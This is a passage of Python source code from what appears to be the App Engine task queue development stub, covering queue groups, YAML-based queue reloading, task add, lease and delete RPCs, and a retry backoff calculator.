task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now)
task['body'] = base64.b64encode(task_response.body())
headers = [(header.key(), header.value())
for header in task_response.header_list()
if header.key().lower() not in BUILT_IN_HEADERS]
headers.append(('X-AppEngine-QueueName', queue_name))
headers.append(('X-AppEngine-TaskName', task_response.task_name()))
headers.append(('X-AppEngine-TaskRetryCount',
str(task_response.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task_response.eta_usec()))))
headers.append(('X-AppEngine-Development-Payload', '1'))
headers.append(('Content-Length', str(len(task['body']))))
if 'content-type' not in frozenset(key.lower() for key, _ in headers):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task_response.execution_count())))
if task_response.has_runlog() and task_response.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task_response.runlog().response_code())))
task['headers'] = headers
return task
class _Group(object):
"""A taskqueue group.
This class contains all of the queues for an application.
"""
def __init__(self, queue_yaml_parser=None, app_id=None,
_all_queues_valid=False, _update_newest_eta=None,
_testing_validate_state=False):
"""Constructor.
Args:
queue_yaml_parser: A function that takes no parameters and returns the
parsed results of the queue.yaml file. If this queue is not based on a
queue.yaml file use None.
app_id: The app id this Group is representing or None if it is the
currently running application.
_all_queues_valid: Automatically generate queues on first access.
_update_newest_eta: Callable for automatically executing tasks.
        Takes the ETA of the task in seconds since the epoch. May be None if
        automatic task running is disabled.
_testing_validate_state: Should this _Group and all of its _Queues
validate their state after each operation? This should only be used
during testing of the taskqueue_stub.
"""
self._queues = {}
self._queue_yaml_parser = queue_yaml_parser
self._all_queues_valid = _all_queues_valid
self._next_task_id = 1
self._app_id = app_id
if _update_newest_eta is None:
self._update_newest_eta = lambda x: None
else:
self._update_newest_eta = _update_newest_eta
self._testing_validate_state = _testing_validate_state
def GetQueuesAsDicts(self):
"""Gets all the applications's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12,
'acl': ['user1@gmail.com']}, ...]
The list of queues always includes the default queue.
"""
self._ReloadQueuesFromYaml()
now = datetime.datetime.utcnow()
queues = []
for queue_name, queue in sorted(self._queues.items()):
queue_dict = {}
queues.append(queue_dict)
queue_dict['name'] = queue_name
queue_dict['bucket_size'] = queue.bucket_capacity
if queue.user_specified_rate is not None:
queue_dict['max_rate'] = queue.user_specified_rate
else:
queue_dict['max_rate'] = ''
if queue.queue_mode == QUEUE_MODE.PULL:
queue_dict['mode'] = 'pull'
else:
queue_dict['mode'] = 'push'
queue_dict['acl'] = queue.acl
oldest_eta = queue.Oldest()
if oldest_eta:
queue_dict['oldest_task'] = _FormatEta(oldest_eta)
queue_dict['eta_delta'] = _EtaDelta(oldest_eta, now)
else:
queue_dict['oldest_task'] = ''
queue_dict['eta_delta'] = ''
queue_dict['tasks_in_queue'] = queue.Count()
if queue.retry_parameters:
retry_proto = queue.retry_parameters
retry_dict = {}
if retry_proto.has_retry_limit():
retry_dict['retry_limit'] = retry_proto.retry_limit()
if retry_proto.has_age_limit_sec():
retry_dict['age_limit_sec'] = retry_proto.age_limit_sec()
if retry_proto.has_min_backoff_sec():
retry_dict['min_backoff_sec'] = retry_proto.min_backoff_sec()
if retry_proto.has_max_backoff_sec():
retry_dict['max_backoff_sec'] = retry_proto.max_backoff_sec()
if retry_proto.has_max_doublings():
retry_dict['max_doublings'] = retry_proto.max_doublings()
queue_dict['retry_parameters'] = retry_dict
return queues
def HasQueue(self, queue_name):
"""Check if the specified queue_name references a valid queue.
Args:
queue_name: The name of the queue to check.
Returns:
True if the queue exists, False otherwise.
"""
self._ReloadQueuesFromYaml()
return queue_name in self._queues and (
self._queues[queue_name] is not None)
def GetQueue(self, queue_name):
"""Gets the _Queue instance for the specified queue.
Args:
queue_name: The name of the queue to fetch.
Returns:
The _Queue instance for the specified queue.
Raises:
KeyError if the queue does not exist.
"""
self._ReloadQueuesFromYaml()
return self._queues[queue_name]
def GetNextPushTask(self):
"""Finds the task with the lowest eta.
Returns:
A tuple containing the queue and task instance for the task with the
lowest eta, or (None, None) if there are no tasks.
"""
min_eta = INF
result = None, None
for queue in self._queues.itervalues():
if queue.queue_mode == QUEUE_MODE.PULL:
continue
task = queue.OldestTask()
if not task:
continue
if task.eta_usec() < min_eta:
result = queue, task
min_eta = task.eta_usec()
return result
def _ConstructQueue(self, queue_name, *args, **kwargs):
if '_testing_validate_state' in kwargs:
raise TypeError(
'_testing_validate_state should not be passed to _ConstructQueue')
kwargs['_testing_validate_state'] = self._testing_validate_state
self._queues[queue_name] = _Queue(queue_name, *args, **kwargs)
def _ConstructAutomaticQueue(self, queue_name):
if queue_name in AUTOMATIC_QUEUES:
self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name])
else:
assert self._all_queues_valid
self._ConstructQueue(queue_name)
def _ReloadQueuesFromYaml(self):
"""Update the queue map with the contents of the queue.yaml file.
This function will remove queues that no longer exist in the queue.yaml
file.
If no queue yaml parser has been defined, this function is a no-op.
"""
if not self._queue_yaml_parser:
return
queue_info = self._queue_yaml_parser()
if queue_info and queue_info.queue:
queues = queue_info.queue
else:
queues = []
old_queues = set(self._queues)
new_queues = set()
for entry in queues:
queue_name = entry.name
new_queues.add(queue_name)
retry_parameters = None
if entry.bucket_size:
bucket_size = entry.bucket_size
else:
bucket_size = DEFAULT_BUCKET_SIZE
if entry.retry_parameters:
retry_parameters = queueinfo.TranslateRetryParameters(
entry.retry_parameters)
if entry.mode == 'pull':
mode = QUEUE_MODE.PULL
if entry.rate is not None:
logging.warning(
'Refill rate must not be specified for pull-based queue. '
'Please check queue.yaml file.')
else:
mode = QUEUE_MODE.PUSH
if entry.rate is None:
logging.warning(
'Refill rate must be specified for push-based queue. '
'Please check queue.yaml file.')
max_rate = entry.rate
if entry.acl is not None:
acl = taskqueue_service_pb.TaskQueueAcl()
for acl_entry in entry.acl:
acl.add_user_email(acl_entry.user_email)
else:
acl = None
if self._queues.get(queue_name) is None:
self._ConstructQueue(queue_name, bucket_capacity=bucket_size,
user_specified_rate=max_rate, queue_mode=mode,
acl=acl, retry_parameters=retry_parameters,
target=entry.target)
else:
queue = self._queues[queue_name]
queue.bucket_size = bucket_size
queue.user_specified_rate = max_rate
queue.acl = acl
queue.queue_mode = mode
queue.retry_parameters = retry_parameters
if mode == QUEUE_MODE.PUSH:
eta = queue.Oldest()
if eta:
self._update_newest_eta(_UsecToSec(eta))
if DEFAULT_QUEUE_NAME not in self._queues:
self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME)
new_queues.add(DEFAULT_QUEUE_NAME)
if not self._all_queues_valid:
for queue_name in old_queues - new_queues:
del self._queues[queue_name]
def _ValidateQueueName(self, queue_name):
"""Tests if the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
      queue_name: The name of the queue to check.
Returns:
If there are no problems, returns TaskQueueServiceError.OK. Otherwise
returns the correct constant from TaskQueueServiceError.
"""
if not queue_name:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME
elif queue_name not in self._queues:
if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid:
self._ConstructAutomaticQueue(queue_name)
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE
elif self._queues[queue_name] is None:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE
return taskqueue_service_pb.TaskQueueServiceError.OK
def _CheckQueueForRpc(self, queue_name):
"""Ensures the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
      queue_name: The name of the queue to check.
Raises:
ApplicationError: If the queue name is invalid, tombstoned or does not
exist.
"""
self._ReloadQueuesFromYaml()
response = self._ValidateQueueName(queue_name)
if response != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(response)
def _ChooseTaskName(self):
"""Returns a string containing a unique task name."""
self._next_task_id += 1
return 'task%d' % (self._next_task_id - 1)
def _VerifyTaskQueueAddRequest(self, request, now):
"""Checks that a TaskQueueAddRequest is valid.
Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest to validate.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A taskqueue_service_pb.TaskQueueServiceError indicating any problems with
the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is
valid.
"""
if request.eta_usec() < 0:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec()))
max_eta = now + MAX_ETA
if eta > max_eta:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
queue_name_response = self._ValidateQueueName(request.queue_name())
if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK:
return queue_name_response
if request.has_crontimetable() and self._app_id is None:
return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED
if request.mode() == QUEUE_MODE.PULL:
max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES
else:
max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES
if request.ByteSize() > max_task_size_bytes:
return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE
return taskqueue_service_pb.TaskQueueServiceError.OK
def BulkAdd_Rpc(self, request, response):
"""Add many tasks to a queue using a single request.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
self._ReloadQueuesFromYaml()
if not request.add_request(0).queue_name():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
error_found = False
task_results_with_chosen_names = set()
now = datetime.datetime.utcfromtimestamp(time.time())
for add_request in request.add_request_list():
task_result = response.add_taskresult()
result = self._VerifyTaskQueueAddRequest(add_request, now)
if result == taskqueue_service_pb.TaskQueueServiceError.OK:
if not add_request.task_name():
chosen_name = self._ChooseTaskName()
add_request.set_task_name(chosen_name)
task_results_with_chosen_names.add(id(task_result))
task_result.set_result(
taskqueue_service_pb.TaskQueueServiceError.SKIPPED)
else:
error_found = True
task_result.set_result(result)
if error_found:
return
if request.add_request(0).has_transaction():
self._TransactionalBulkAdd(request)
else:
self._NonTransactionalBulkAdd(request, response, now)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
if (task_result.result() ==
taskqueue_service_pb.TaskQueueServiceError.SKIPPED):
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if id(task_result) in task_results_with_chosen_names:
task_result.set_chosen_task_name(add_request.task_name())
def _TransactionalBulkAdd(self, request):
"""Uses datastore.AddActions to associate tasks with a transaction.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
assigned unique names.
"""
try:
apiproxy_stub_map.MakeSyncCall(
'datastore_v3', 'AddActions', request, api_base_pb.VoidProto())
except apiproxy_errors.ApplicationError, e:
raise apiproxy_errors.ApplicationError(
e.application_error +
taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR,
e.error_detail)
def _NonTransactionalBulkAdd(self, request, response, now):
"""Adds tasks to the appropriate _Queue instance.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
those with empty names have been assigned unique names.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate
with the results. N.B. the chosen_task_name field in the response will
not be filled-in.
now: A datetime.datetime object containing the current time in UTC.
"""
queue_mode = request.add_request(0).mode()
queue_name = request.add_request(0).queue_name()
store = self._queues[queue_name]
if store.queue_mode != queue_mode:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
try:
store.Add(add_request, now)
except apiproxy_errors.ApplicationError, e:
task_result.set_result(e.application_error)
else:
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if (store.queue_mode == QUEUE_MODE.PUSH and
store.Oldest() == add_request.eta_usec()):
self._update_newest_eta(_UsecToSec(add_request.eta_usec()))
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
queue_name = request.queue_name()
    error = self._ValidateQueueName(queue_name)
    is_unknown_queue = (
        error == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
    if error != taskqueue_service_pb.TaskQueueServiceError.OK and (
        not is_unknown_queue):
      raise apiproxy_errors.ApplicationError(error)
if is_unknown_queue:
self._queues[queue_name] = _Queue(request.queue_name())
if self._app_id is not None:
self._queues[queue_name].Populate(random.randint(10, 100))
self._queues[queue_name].UpdateQueue_Rpc(request, response)
def FetchQueues_Rpc(self, request, response):
"""Implementation of the FetchQueues RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._ReloadQueuesFromYaml()
for queue_name in sorted(self._queues):
if response.queue_size() > request.max_rows():
break
if self._queues[queue_name] is None:
continue
self._queues[queue_name].FetchQueues_Rpc(request, response)
def FetchQueueStats_Rpc(self, request, response):
"""Implementation of the FetchQueueStats rpc which returns 'random' data.
This implementation loads some stats from the task store, the rest are
random numbers.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
for queue_name in request.queue_name_list():
stats = response.add_queuestats()
if queue_name not in self._queues:
stats.set_num_tasks(0)
stats.set_oldest_eta_usec(-1)
continue
store = self._queues[queue_name]
stats.set_num_tasks(store.Count())
if stats.num_tasks() == 0:
stats.set_oldest_eta_usec(-1)
else:
stats.set_oldest_eta_usec(store.Oldest())
if random.randint(0, 9) > 0:
scanner_info = stats.mutable_scanner_info()
scanner_info.set_executed_last_minute(random.randint(0, 10))
scanner_info.set_executed_last_hour(scanner_info.executed_last_minute()
+ random.randint(0, 100))
scanner_info.set_sampling_duration_seconds(random.random() * 10000.0)
scanner_info.set_requests_in_flight(random.randint(0, 10))
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryTasks_Rpc(request, response)
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._ReloadQueuesFromYaml()
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].FetchTask_Rpc(request, response)
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._ReloadQueuesFromYaml()
def _AddResultForAll(result):
for _ in request.task_name_list():
response.add_result(result)
if request.queue_name() not in self._queues:
_AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
elif self._queues[request.queue_name()] is None:
_AddResultForAll(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE)
else:
self._queues[request.queue_name()].Delete_Rpc(request, response)
def DeleteQueue_Rpc(self, request, response):
"""Implementation of the DeleteQueue RPC.
Tombstones the queue.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()] = None
def PauseQueue_Rpc(self, request, response):
"""Implementation of the PauseQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].paused = request.pause()
def PurgeQueue_Rpc(self, request, response):
"""Implementation of the PurgeQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].PurgeQueue()
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response)
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response)
class Retry(object):
"""Task retry caclulator class.
Determines if and when a task should next be run
"""
_default_params = taskqueue_service_pb.TaskQueueRetryParameters()
def __init__(self, task, queue):
"""Constructor.
Args:
task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance.
May be None.
queue: A _Queue instance. May be None.
"""
if task is not None and task.has_retry_parameters():
self._params = task.retry_parameters()
elif queue is not None and queue.retry_parameters is not None:
self._params = queue.retry_parameters
else:
self._params = self._default_params
def CanRetry(self, retry_count, age_usec):
"""Computes whether a task can be retried.
Args:
retry_count: An integer specifying which retry this is.
age_usec: An integer specifying the microseconds since the first try.
Returns:
True if a task is eligible for retrying.
"""
if self._params.has_retry_limit() and self._params.has_age_limit_sec():
return (self._params.retry_limit() >= retry_count or
self._params.age_limit_sec() >= _UsecToSec(age_usec))
if self._params.has_retry_limit():
return self._params.retry_limit() >= retry_count
if self._params.has_age_limit_sec():
return self._params.age_limit_sec() >= _UsecToSec(age_usec)
return True
def CalculateBackoffUsec(self, retry_count):
"""Calculates time before the specified retry.
Args:
retry_count: An integer specifying which retry this is.
Returns:
The number of microseconds before a task should be retried.
"""
exponent = min(retry_count - 1, self._params.max_doublings())
linear_steps = retry_count - exponent
min_backoff_usec = _SecToUsec(self._params.min_backoff_sec())
max_backoff_usec = _SecToUsec(self._params.max_backoff_sec())
backoff_usec = min_backoff_usec
if exponent > 0:
backoff_usec *= (2 ** (min(1023, exponent)))
if linear_steps > 1:
backoff_usec *= linear_steps
return int(min(max_backoff_usec, backoff_usec))
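  # Illustrative schedule (not defaults from this file): with
  # min_backoff_sec=1 and max_doublings=3, successive retries wait roughly
  # 1s, 2s, 4s, 8s, then grow linearly (16s, 24s, 32s, ...) and are always
  # capped at max_backoff_sec.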
class _Queue(object):
"""A Taskqueue Queue.
This class contains all of the properties of a queue and a sorted list of
tasks.
"""
def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT,
bucket_capacity=DEFAULT_BUCKET_SIZE,
user_specified_rate=DEFAULT_RATE, retry_parameters=None,
max_concurrent_requests=None, paused=False,
queue_mode=QUEUE_MODE.PUSH, acl=None,
_testing_validate_state=None, target=None):
self.queue_name = queue_name
self.bucket_refill_per_second = bucket_refill_per_second
self.bucket_capacity = bucket_capacity
self.user_specified_rate = user_specified_rate
self.retry_parameters = retry_parameters
self.max_concurrent_requests = max_concurrent_requests
self.paused = paused
self.queue_mode = queue_mode
self.acl = acl
self.target = target
self._testing_validate_state = _testing_validate_state
self.task_name_archive = set()
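    # Three parallel indexes over the same task protos: by name (lookups and
    # tombstone checks), by (eta, name) (scheduling order), and by
    # (tag, eta, name) (group-by-tag leasing of pull tasks).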
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
self._lock = threading.Lock()
def VerifyIndexes(self):
"""Ensures that all three indexes are in a valid state.
This method is used by internal tests and should not need to be called in
any other circumstances.
Raises:
AssertionError: if the indexes are not in a valid state.
"""
assert self._IsInOrder(self._sorted_by_name)
assert self._IsInOrder(self._sorted_by_eta)
assert self._IsInOrder(self._sorted_by_tag)
tasks_by_name = set()
tasks_with_tags = set()
for name, task in self._sorted_by_name:
assert name == task.task_name()
assert name not in tasks_by_name
tasks_by_name.add(name)
if task.has_tag():
tasks_with_tags.add(name)
tasks_by_eta = set()
for eta, name, task in self._sorted_by_eta:
assert name == task.task_name()
assert eta == task.eta_usec()
assert name not in tasks_by_eta
tasks_by_eta.add(name)
assert tasks_by_eta == tasks_by_name
tasks_by_tag = set()
for tag, eta, name, task in self._sorted_by_tag:
assert name == task.task_name()
assert eta == task.eta_usec()
assert task.has_tag() and task.tag()
assert tag == task.tag()
assert name not in tasks_by_tag
tasks_by_tag.add(name)
assert tasks_by_tag == tasks_with_tags
@staticmethod
def _IsInOrder(l):
"""Determine if the specified list is in ascending order.
Args:
l: The list to check
Returns:
True if the list is in order, False otherwise
"""
sorted_list = sorted(l)
return l == sorted_list
def _WithLock(f):
"""Runs the decorated function within self._lock.
Args:
f: The function to be delegated to. Must be a member function (take self
as the first parameter).
Returns:
The result of f.
"""
def _Inner(self, *args, **kwargs):
with self._lock:
ret = f(self, *args, **kwargs)
if self._testing_validate_state:
self.VerifyIndexes()
return ret
_Inner.__doc__ = f.__doc__
return _Inner
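  # Note: _WithLock is intentionally a plain function in the class body rather
  # than a staticmethod, so it can be applied as a decorator to the methods
  # below while they are being defined.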
@_WithLock
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
assert request.queue_name() == self.queue_name
self.bucket_refill_per_second = request.bucket_refill_per_second()
self.bucket_capacity = request.bucket_capacity()
if request.has_user_specified_rate():
self.user_specified_rate = request.user_specified_rate()
else:
self.user_specified_rate = None
if request.has_retry_parameters():
self.retry_parameters = request.retry_parameters()
else:
self.retry_parameters = None
if request.has_max_concurrent_requests():
self.max_concurrent_requests = request.max_concurrent_requests()
else:
self.max_concurrent_requests = None
self.queue_mode = request.mode()
if request.has_acl():
self.acl = request.acl()
else:
self.acl = None
@_WithLock
def FetchQueues_Rpc(self, request, response):
"""Fills out a queue message on the provided TaskQueueFetchQueuesResponse.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
response_queue = response.add_queue()
response_queue.set_queue_name(self.queue_name)
response_queue.set_bucket_refill_per_second(
self.bucket_refill_per_second)
response_queue.set_bucket_capacity(self.bucket_capacity)
if self.user_specified_rate is not None:
response_queue.set_user_specified_rate(self.user_specified_rate)
if self.max_concurrent_requests is not None:
response_queue.set_max_concurrent_requests(
self.max_concurrent_requests)
if self.retry_parameters is not None:
response_queue.retry_parameters().CopyFrom(self.retry_parameters)
response_queue.set_paused(self.paused)
if self.queue_mode is not None:
response_queue.set_mode(self.queue_mode)
if self.acl is not None:
response_queue.mutable_acl().CopyFrom(self.acl)
@_WithLock
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
assert not request.has_start_tag()
if request.has_start_eta_usec():
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name(),
eta=request.start_eta_usec())
else:
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name())
for task in tasks:
response.add_task().MergeFrom(task)
@_WithLock
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
task_name = request.task_name()
pos = self._LocateTaskByName(task_name)
if pos is None:
if task_name in self.task_name_archive:
error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
raise apiproxy_errors.ApplicationError(error)
_, task = self._sorted_by_name[pos]
response.mutable_task().add_task().CopyFrom(task)
@_WithLock
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store. We mimic a 1/20 chance of a
TRANSIENT_ERROR when the request has an app_id.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
for taskname in request.task_name_list():
if request.has_app_id() and random.random() <= 0.05:
response.add_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
else:
response.add_result(self._DeleteNoAcquireLock(taskname))
def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec,
tag=None):
assert self._lock.locked()
if group_by_tag and tag:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, None, None,),
end_key=(tag, now_eta_usec, None,),
max_rows=max_rows)
elif group_by_tag:
tasks = self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
if not tasks:
return []
if tasks[0].has_tag():
tag = tasks[0].tag()
return self._QueryAndOwnTasksGetTaskList(
max_rows, True, now_eta_usec, tag)
else:
return [task for task in tasks if not task.has_tag()]
else:
return self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
@_WithLock
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
max_tasks = request.max_tasks()
if max_tasks <= 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
if request.has_tag() and not request.group_by_tag():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST,
'Tag specified, but group_by_tag was not.')
now_eta_usec = _SecToUsec(time.time())
tasks = self._QueryAndOwnTasksGetTaskList(
max_tasks, request.group_by_tag(), now_eta_usec, request.tag())
tasks_to_delete = []
for task in tasks:
retry = Retry(task, self)
if not retry.CanRetry(task.retry_count() + 1, 0):
logging.warning(
'Task %s in queue %s cannot be leased again after %d leases.',
task.task_name(), self.queue_name, task.retry_count())
tasks_to_delete.append(task)
continue
self._PostponeTaskNoAcquireLock(
task, now_eta_usec + _SecToUsec(lease_seconds))
task_response = response.add_task()
task_response.set_task_name(task.task_name())
task_response.set_eta_usec(task.eta_usec())
task_response.set_retry_count(task.retry_count())
if task.has_tag():
task_response.set_tag(task.tag())
task_response.set_body(task.body())
for task in tasks_to_delete:
self._DeleteNoAcquireLock(task.task_name())
@_WithLock
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
if self.paused:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
pos = self._LocateTaskByName(request.task_name())
if pos is None:
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
_, task = self._sorted_by_name[pos]
if task.eta_usec() != request.eta_usec():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
now_usec = _SecToUsec(time.time())
if task.eta_usec() < now_usec:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
future_eta_usec = now_usec + _SecToUsec(lease_seconds)
self._PostponeTaskNoAcquireLock(
task, future_eta_usec, increase_retries=False)
response.set_updated_eta_usec(future_eta_usec)
@_WithLock
def IncRetryCount(self, task_name):
"""Increment the retry count of a task by 1.
Args:
task_name: The name of the task to update.
"""
pos = self._LocateTaskByName(task_name)
assert pos is not None, (
'Task does not exist when trying to increase retry count.')
task = self._sorted_by_name[pos][1]
self._IncRetryCount(task)
def _IncRetryCount(self, task):
assert self._lock.locked()
retry_count = task.retry_count()
task.set_retry_count(retry_count + 1)
task.set_execution_count(task.execution_count() + 1)
@_WithLock
def GetTasksAsDicts(self):
"""Gets all of the tasks in this queue.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
